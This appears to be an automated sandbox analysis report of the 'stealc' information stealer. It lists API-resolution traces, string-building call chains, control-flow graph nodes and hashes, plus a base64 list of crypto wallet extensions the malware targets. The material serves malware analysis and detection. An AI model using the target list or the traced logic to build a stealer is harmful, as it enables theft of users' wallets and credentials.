                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFBB88), ref: 00789D51
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFBA08), ref: 00789D69
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFBAE8), ref: 00789D82
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF2200), ref: 00789D9A
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF21D0), ref: 00789DB2
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFA608), ref: 00789DCB
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFBA88), ref: 00789DE3
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF2218), ref: 00789DFB
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF21E8), ref: 00789E14
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF2248), ref: 00789E2C
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF21A0), ref: 00789E44
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFBAA8), ref: 00789E5D
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF21B8), ref: 00789E75
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF4F8), ref: 00789E8D
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF510), ref: 00789EA6
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF4B0), ref: 00789EBE
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF3F0), ref: 00789ED6
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF450), ref: 00789EEF
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF3D8), ref: 00789F07
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF4C8), ref: 00789F1F
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF420), ref: 00789F38
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CF48A8), ref: 00789F50
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF5D0), ref: 00789F68
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF5E8), ref: 00789F81
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFBB48), ref: 00789F99
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF4E0), ref: 00789FB1
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFB888), ref: 00789FCA
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF468), ref: 00789FE2
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFF438), ref: 00789FFA
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFBAC8), ref: 0078A013
                                                                                                                                                                            • GetProcAddress.KERNEL32(77190000,00CFBB28), ref: 0078A02B
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CFF5B8,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A03D
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CFF540,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A04E
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CFF330,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A060
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CFF348,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A072
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CFF480,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A083
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CFF600,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A095
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CFF3C0,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A0A7
                                                                                                                                                                            • LoadLibraryA.KERNEL32(00CFF570,?,00785CA3,?,00000034,00000064,00786600,?,0000002C,00000064,007865A0,?,00000030,00000064,Function_00015AD0,?), ref: 0078A0B8
                                                                                                                                                                            • GetProcAddress.KERNEL32(77040000,00CFBC28), ref: 0078A0DA
                                                                                                                                                                            • GetProcAddress.KERNEL32(77040000,00CFF618), ref: 0078A0F2
                                                                                                                                                                            • GetProcAddress.KERNEL32(77040000,00CFD8B8), ref: 0078A10A
                                                                                                                                                                            • GetProcAddress.KERNEL32(77040000,00CFF528), ref: 0078A123
                                                                                                                                                                            • GetProcAddress.KERNEL32(77040000,00CFB868), ref: 0078A13B
                                                                                                                                                                            • GetProcAddress.KERNEL32(73D20000,00CFA6F8), ref: 0078A160
                                                                                                                                                                            • GetProcAddress.KERNEL32(73D20000,00CFBD28), ref: 0078A179
                                                                                                                                                                            • GetProcAddress.KERNEL32(73D20000,00CFA7E8), ref: 0078A191
                                                                                                                                                                            • GetProcAddress.KERNEL32(73D20000,00CFF360), ref: 0078A1A9
                                                                                                                                                                            • GetProcAddress.KERNEL32(73D20000,00CFF408), ref: 0078A1C2
                                                                                                                                                                            • GetProcAddress.KERNEL32(73D20000,00CFBF88), ref: 0078A1DA
                                                                                                                                                                            • GetProcAddress.KERNEL32(73D20000,00CFBE88), ref: 0078A1F2
                                                                                                                                                                            • GetProcAddress.KERNEL32(73D20000,00CFF498), ref: 0078A20B
                                                                                                                                                                            • GetProcAddress.KERNEL32(768D0000,00CFBEC8), ref: 0078A22C
                                                                                                                                                                            • GetProcAddress.KERNEL32(768D0000,00CFBD88), ref: 0078A244
                                                                                                                                                                            • GetProcAddress.KERNEL32(768D0000,00CFF378), ref: 0078A25D
                                                                                                                                                                            • GetProcAddress.KERNEL32(768D0000,00CFF558), ref: 0078A275
                                                                                                                                                                            • GetProcAddress.KERNEL32(768D0000,00CFBF08), ref: 0078A28D
                                                                                                                                                                            • GetProcAddress.KERNEL32(75790000,00CFA658), ref: 0078A2B3
                                                                                                                                                                            • GetProcAddress.KERNEL32(75790000,00CFA720), ref: 0078A2CB
                                                                                                                                                                            • GetProcAddress.KERNEL32(75790000,00CFF588), ref: 0078A2E3
                                                                                                                                                                            • GetProcAddress.KERNEL32(75790000,00CFBFE8), ref: 0078A2FC
                                                                                                                                                                            • GetProcAddress.KERNEL32(75790000,00CFBD48), ref: 0078A314
                                                                                                                                                                            • GetProcAddress.KERNEL32(75790000,00CFA4C8), ref: 0078A32C
                                                                                                                                                                            • GetProcAddress.KERNEL32(75A10000,00CFF5A0), ref: 0078A352
                                                                                                                                                                            • GetProcAddress.KERNEL32(75A10000,00CFBDC8), ref: 0078A36A
                                                                                                                                                                            • GetProcAddress.KERNEL32(75A10000,00CFD6E8), ref: 0078A382
                                                                                                                                                                            • GetProcAddress.KERNEL32(75A10000,00CFF390), ref: 0078A39B
                                                                                                                                                                            • GetProcAddress.KERNEL32(75A10000,00CFF3A8), ref: 0078A3B3
                                                                                                                                                                            • GetProcAddress.KERNEL32(75A10000,00CFBEE8), ref: 0078A3CB
                                                                                                                                                                            • GetProcAddress.KERNEL32(75A10000,00CFBC48), ref: 0078A3E4
                                                                                                                                                                            • GetProcAddress.KERNEL32(75A10000,00CFF660), ref: 0078A3FC
                                                                                                                                                                            • GetProcAddress.KERNEL32(75A10000,00CFF690), ref: 0078A414
                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00CFBD68), ref: 0078A436
                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00CFF6D8), ref: 0078A44E
                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00CFF6C0), ref: 0078A466
                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00CFF6A8), ref: 0078A47F
                                                                                                                                                                            • GetProcAddress.KERNEL32(76850000,00CFF648), ref: 0078A497
                                                                                                                                                                            • GetProcAddress.KERNEL32(75690000,00CFBFC8), ref: 0078A4B8
                                                                                                                                                                            • GetProcAddress.KERNEL32(75690000,00CFBF48), ref: 0078A4D1
                                                                                                                                                                            • GetProcAddress.KERNEL32(769C0000,00CFBFA8), ref: 0078A4F2
                                                                                                                                                                            • GetProcAddress.KERNEL32(769C0000,00CFF630), ref: 0078A50A
                                                                                                                                                                            • GetProcAddress.KERNEL32(6F8C0000,00CFBEA8), ref: 0078A530
                                                                                                                                                                            • GetProcAddress.KERNEL32(6F8C0000,00CFBDA8), ref: 0078A548
                                                                                                                                                                            • GetProcAddress.KERNEL32(6F8C0000,00CFBF28), ref: 0078A560
                                                                                                                                                                            • GetProcAddress.KERNEL32(6F8C0000,00CFF678), ref: 0078A579
                                                                                                                                                                            • GetProcAddress.KERNEL32(6F8C0000,00CFBE08), ref: 0078A591
                                                                                                                                                                            • GetProcAddress.KERNEL32(6F8C0000,00CFBCC8), ref: 0078A5A9
                                                                                                                                                                            • GetProcAddress.KERNEL32(6F8C0000,00CFBDE8), ref: 0078A5C2
                                                                                                                                                                            • GetProcAddress.KERNEL32(6F8C0000,00CFBC68), ref: 0078A5DA
                                                                                                                                                                            • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 0078A5F1
                                                                                                                                                                            • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 0078A607
                                                                                                                                                                            • GetProcAddress.KERNEL32(75D90000,00CFF6F0), ref: 0078A629
                                                                                                                                                                            • GetProcAddress.KERNEL32(75D90000,00CFD818), ref: 0078A641
                                                                                                                                                                            • GetProcAddress.KERNEL32(75D90000,00CFFD50), ref: 0078A659
                                                                                                                                                                            • GetProcAddress.KERNEL32(75D90000,00CFFD98), ref: 0078A672
                                                                                                                                                                            • GetProcAddress.KERNEL32(76470000,00CFBE68), ref: 0078A693
                                                                                                                                                                            • GetProcAddress.KERNEL32(6FF40000,00CFFE58), ref: 0078A6B4
                                                                                                                                                                            • GetProcAddress.KERNEL32(6FF40000,00CFBF68), ref: 0078A6CD
                                                                                                                                                                            • GetProcAddress.KERNEL32(6FF40000,00CFFE10), ref: 0078A6E5
                                                                                                                                                                            • GetProcAddress.KERNEL32(6FF40000,00CFFD80), ref: 0078A6FD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                            • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                                                                                                            • API String ID: 2238633743-1775429166
                                                                                                                                                                            • Opcode ID: d9232601007fcf0e3d13745e77124f43eaa2abb267a4d2828e3bc11aff1ae9e1
                                                                                                                                                                            • Instruction ID: e2cbec7cdddbe632fb7a0340c72b66694d0c3363c774bcc2207a18f4c84f755c
                                                                                                                                                                            • Opcode Fuzzy Hash: d9232601007fcf0e3d13745e77124f43eaa2abb267a4d2828e3bc11aff1ae9e1
                                                                                                                                                                            • Instruction Fuzzy Hash: 60622BB592C200AFC754DFA8EFC895637F9F74C721724871AA609C3674DA3A9841FB12

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,Db2luOTggV2FsbGV0fGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbGV0fGNnZWVvZHBmYWdqY2VlZmllZmxtZGZwaHBsa2VubGZrfDF8MHwwfEthcmRpYUNoYWluIFdhbGxldHxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXxhY21hY29ka2piZGdtb2xlZWJvbG1kam9uaWx,?,007861C4,?), ref: 00777724
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,007861C4,?), ref: 0077772B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFD0F8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 007778DB
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 007778EF
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777903
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777917
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 0077792B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 0077793F
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 00777952
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777966
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00D00718,?,007861C4,?), ref: 0077797A
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 0077798E
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 007779A2
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 007779B6
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 007779C9
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 007779DD
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 007779F1
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777A04
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00D00780,?,007861C4,?), ref: 00777A18
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777A2C
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777A40
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777A54
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 00777A68
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 00777A7B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 00777A8F
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777AA3
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00D007E8,?,007861C4,?), ref: 00777AB6
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777ACA
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777ADE
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777AF2
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 00777B06
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 00777B1A
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 00777B2D
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777B41
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00D00850,?,007861C4,?), ref: 00777B55
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777B69
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777B7D
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777B91
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 00777BA4
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 00777BB8
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 00777BCC
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777BDF
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00D008B8,?,007861C4,?), ref: 00777BF3
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777C07
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777C1B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,?,?,007861C4,?), ref: 00777C2F
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFB40,?,007861C4,?), ref: 00777C43
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC00,?,007861C4,?), ref: 00777C56
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC30,?,007861C4,?), ref: 00777C6A
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFFC78,?,007861C4,?), ref: 00777C7E
                                                                                                                                                                              • Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,007917FC,00777C90,80000001,007861C4,?,?,?,?,?,00777C90,?,?,007861C4), ref: 00777606
                                                                                                                                                                              • Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,00000000,00000000), ref: 00777648
                                                                                                                                                                              • Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020, : ), ref: 0077765A
                                                                                                                                                                              • Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,00000000,00000000,00000000), ref: 0077768F
                                                                                                                                                                              • Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,00791804), ref: 007776A0
                                                                                                                                                                              • Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,00000000,00000000,00000000), ref: 007776D3
                                                                                                                                                                              • Part of subcall function 007775D0: lstrcatA.KERNEL32(33548020,00791808), ref: 007776ED
                                                                                                                                                                              • Part of subcall function 007775D0: task.LIBCPMTD ref: 007776FB
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00CFD8E8,?,00000104), ref: 00777E0B
                                                                                                                                                                            • lstrcatA.KERNEL32(?,00D001A0), ref: 00777E1E
                                                                                                                                                                            • lstrlenA.KERNEL32(33548020), ref: 00777E2B
                                                                                                                                                                            • lstrlenA.KERNEL32(33548020), ref: 00777E3B
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                            Strings
                                                                                                                                                                            • Db2luOTggV2FsbGV0fGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbGV0fGNnZWVvZHBmYWdqY2VlZmllZmxtZGZwaHBsa2VubGZrfDF8MHwwfEthcmRpYUNoYWluIFdhbGxldHxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXxhY21hY29ka2piZGdtb2xlZWJvbG1kam9uaWx, xrefs: 0077771D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2160443976.0000000000771000.00000080.00000001.01000000.00000009.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2159936967.0000000000770000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160599765.000000000078E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160665154.000000000079B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000007FF000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000802000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000821000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000082E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000852000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000085F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000087F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000088E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000915000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.0000000000935000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.000000000093B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2160830623.00000000009BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2162587805.00000000009CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_770000_stealc_default2.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
                                                                                                                                                                            • String ID: Db2luOTggV2FsbGV0fGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF8MHwwfEVWRVIgV2FsbGV0fGNnZWVvZHBmYWdqY2VlZmllZmxtZGZwaHBsa2VubGZrfDF8MHwwfEthcmRpYUNoYWluIFdhbGxldHxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXxhY21hY29ka2piZGdtb2xlZWJvbG1kam9uaWx
                                                                                                                                                                            • API String ID: 928082926-3339970061
                                                                                                                                                                            • Opcode ID: 9a59193d3eec41abc7d3469c61545a7ca1cc18b3361031207247b46b836b5c36
                                                                                                                                                                            • Instruction ID: dd3c3a3d26858843429f6d5decb7cafffae2eba94575410ce68dee667d1b0b48
                                                                                                                                                                            • Opcode Fuzzy Hash: 9a59193d3eec41abc7d3469c61545a7ca1cc18b3361031207247b46b836b5c36
                                                                                                                                                                            • Instruction Fuzzy Hash: 083210B2D14314ABCB55EBA0DC89DEA737CBB44710F444A98F21D62090EE78EB85DF52

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 825 780250-7802e2 call 78a740 call 788de0 call 78a920 call 78a8a0 call 78a800 * 2 call 78a9b0 call 78a8a0 call 78a800 call 78a7a0 call 7799c0 847 7802e7-7802ec 825->847 848 7802f2-780309 call 788e30 847->848 849 780726-780739 call 78a800 call 771550 847->849 848->849 854 78030f-78036f strtok_s call 78a740 * 4 GetProcessHeap HeapAlloc 848->854 865 780372-780376 854->865 866 78068a-780721 lstrlenA call 78a7a0 call 771590 call 785190 call 78a800 memset call 78aa40 * 4 call 78a800 * 4 865->866 867 78037c-78038d StrStrA 865->867 866->849 869 78038f-7803c1 lstrlenA call 7888e0 call 78a8a0 call 78a800 867->869 870 7803c6-7803d7 StrStrA 867->870 869->870 873 7803d9-78040b lstrlenA call 7888e0 call 78a8a0 call 78a800 870->873 874 780410-780421 StrStrA 870->874 873->874 878 78045a-78046b StrStrA 874->878 879 780423-780455 lstrlenA call 7888e0 call 78a8a0 call 78a800 874->879 881 7804f9-78050b call 78aad0 lstrlenA 878->881 882 780471-7804c3 lstrlenA call 7888e0 call 78a8a0 call 78a800 call 78aad0 call 779ac0 878->882 879->878 900 78066f-780685 strtok_s 881->900 901 780511-780523 call 78aad0 lstrlenA 881->901 882->881 928 7804c5-7804f4 call 78a820 call 78a9b0 call 78a8a0 call 78a800 882->928 900->865 901->900 912 780529-78053b call 78aad0 lstrlenA 901->912 912->900 920 780541-780553 call 78aad0 lstrlenA 912->920 920->900 930 780559-78066a lstrcatA * 3 call 78aad0 lstrcatA * 2 call 78aad0 lstrcatA * 3 call 78aad0 lstrcatA * 3 call 78aad0 lstrcatA * 3 call 78a820 * 4 920->930 928->881 930->900
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0078A740: lstrcpy.KERNEL32(y,00000000), ref: 0078A788
                                                                                                                                                                              • Part of subcall function 00788DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00788E0B
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcpy.KERNEL32(00000000,?), ref: 0078A972
                                                                                                                                                                              • Part of subcall function 0078A920: lstrcatA.KERNEL32(00000000), ref: 0078A982
                                                                                                                                                                              • Part of subcall function 0078A8A0: lstrcpy.KERNEL32(?,y), ref: 0078A905
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrlenA.KERNEL32(?,00791110,?,00000000,00790AEF), ref: 0078A9C5
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcpy.KERNEL32(00000000), ref: 0078AA04
                                                                                                                                                                              • Part of subcall function 0078A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0078AA12
                                                                                                                                                                              • Part of subcall function 0078A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0078A7E6
                                                                                                                                                                              • Part of subcall function 007799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007799EC
                                                                                                                                                                              • Part of subcall function 007799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00779A11
                                                                                                                                                                              • Part of subcall function 007799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00779A31
